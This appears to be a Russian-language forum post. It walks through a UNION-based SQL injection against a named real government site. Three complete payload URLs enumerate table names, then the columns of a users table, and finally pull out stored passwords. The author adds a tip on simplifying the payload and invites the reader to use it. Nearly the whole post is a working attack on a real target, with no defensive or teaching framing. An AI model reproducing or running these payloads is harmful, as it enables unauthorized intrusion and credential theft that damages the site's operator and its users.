Вот так иньекция работает. Тут пятая версия, поетому с именами проблем нету.
http://nepal.usaid.gov/story.php?id=-41%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(ta ble_name%20,0x17),0x17),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20fro m%20information_schema.tables%20limit%2056,1/*&pid=52
А вот так получаешь явки и пароли
http://nepal.usaid.gov/story.php?id=-41%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(co lumn_name%20,0x17),0x17),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20fr om%20information_schema.columns%20where%20table_na me=CHAR(106,95,117,115,101,114,115)%20limit%204,1/*&pid=52
Лимит дает доступ к разным полям, я показал название одного из полей.
А вот и данные
http://nepal.usaid.gov/story.php?id=-41%20union%20select%201,password,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28%20from%20j_users/*&pid=52
(Только заметил что можно без AES_DECRYPT AES_ENCRYPT но не всегда). Пользуйся. Вот только куда эти данные подставлять я не нашел, нету там входа никакого!